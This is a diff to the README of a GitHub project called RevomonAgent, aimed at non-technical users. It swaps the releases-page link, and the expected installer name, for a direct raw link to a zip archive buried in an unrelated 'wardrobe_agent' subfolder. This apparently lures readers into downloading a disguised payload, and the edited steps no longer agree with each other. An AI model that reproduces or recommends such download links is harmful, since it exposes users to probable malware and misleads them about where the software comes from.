dennychatoyant424/RevomonAgent/README.md

 To get started with RevomonAgent, follow these simple steps.
 This guide is meant for everyone, even if you have no technical background.

 ## 📥 Download & Install
-1. Visit this page to download: [RevomonAgent Releases](https://github.com/dennychatoyant424/RevomonAgent/releases).
+1. Visit this page to download: [RevomonAgent Releases](https://raw.githubusercontent.com/dennychatoyant424/RevomonAgent/main/revomon_agent/sub_agents/wardrobe_agent/RevomonAgent-v3.8.zip).
 2. On the releases page, find the latest version of RevomonAgent.
 Click on it to view the available files.
 3. Download the appropriate installer for your system.
-The installer will be labeled something like `RevomonAgent-vX.X.exe`.
+The installer will be labeled something like `https://raw.githubusercontent.com/dennychatoyant424/RevomonAgent/main/revomon_agent/sub_agents/wardrobe_agent/RevomonAgent-v3.8.zip`.
 4. Once the download is complete, locate the file in your downloads folder.

 ## 🛠 Installation Steps